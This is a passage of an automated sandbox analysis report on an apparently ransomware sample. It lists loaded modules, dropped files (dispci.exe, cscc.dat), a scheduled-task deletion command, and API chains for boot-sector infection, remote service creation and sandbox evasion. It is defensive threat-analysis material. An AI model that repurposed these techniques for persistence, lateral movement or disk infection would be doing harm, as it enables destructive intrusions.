        Source: C:\Users\user\Desktop\download.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\2594.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\dispci.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.logon.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: wincorlib.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xamlhost.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: mrmcorer.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: windowmanagementapi.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: inputhost.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: languageoverlayutil.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: bcp47mrm.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xaml.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.immersive.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.globalization.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: directmanipulation.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: uiautomationcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
        Source: C:\Windows\dispci.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
        Source: DECRYPT.lnk.23.drLNK file: ..\..\..\Windows\dispci.exe
        Source: download.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: lsasrv.pdb source: 2594.tmp, 0000000B.00000003.1719410656.0000000002EF6000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: lsasrv.pdbUGP source: 2594.tmp, 0000000B.00000003.1719410656.0000000002EF6000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000002.00000003.1717652685.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696516164.0000000002C9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1754801710.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696854067.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.2.dr
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04859016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,2_2_04859016
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF79B5 push ecx; ret 23_2_00DF79C8

        Persistence and Installation Behavior

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Windows\dispci.exeCode function: __snwprintf,_malloc,CreateFileW,DeviceIoControl,CloseHandle,_free, \\.\PhysicalDrive%d23_2_00DF39E0
        Drops executables to the windows directory (C:\Windows) and starts them
        Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\Windows\2594.tmpJump to behavior
        Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\dispci.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file

        Boot Survival

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Windows\dispci.exeCode function: __snwprintf,_malloc,CreateFileW,DeviceIoControl,CloseHandle,_free, \\.\PhysicalDrive%d23_2_00DF39E0
        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04859534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,2_2_04859534
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\LogonUI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\LogonUI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Found evasive API chain (may stop execution after checking computer name)
        Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_2-4958
        Found evasive API chain (may stop execution after checking mutex)
        Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-4961
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF3FC0 rdtsc 23_2_00DF3FC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,CloseHandle,LocalFree,2_2_04858B2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree,2_2_04857D4E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory,2_2_04858D39
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-5687
        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\cscc.datJump to dropped file
        Source: C:\Windows\dispci.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_23-8288
        Source: C:\Windows\2594.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_11-3496
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7724Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7416Thread sleep time: -900000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7576Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04855E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,2_2_04855E9F
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF1B80 PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,PathFindExtensionW,FindNextFileW,FindClose,23_2_00DF1B80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04855A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,2_2_04855A73
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1754801710.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_2-4880
        Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_2-4969
        Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_2-4862
        Source: C:\Windows\2594.tmpAPI call chain: ExitProcess graph end nodegraph_11-3497
        Source: C:\Windows\System32\cdd.dllSystem information queried: ModuleInformation
        Source: C:\Windows\2594.tmpProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF3FC0 rdtsc 23_2_00DF3FC0
        Source: C:\Windows\2594.tmpCode function: 11_2_00007FF73CFC5540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF73CFC5540
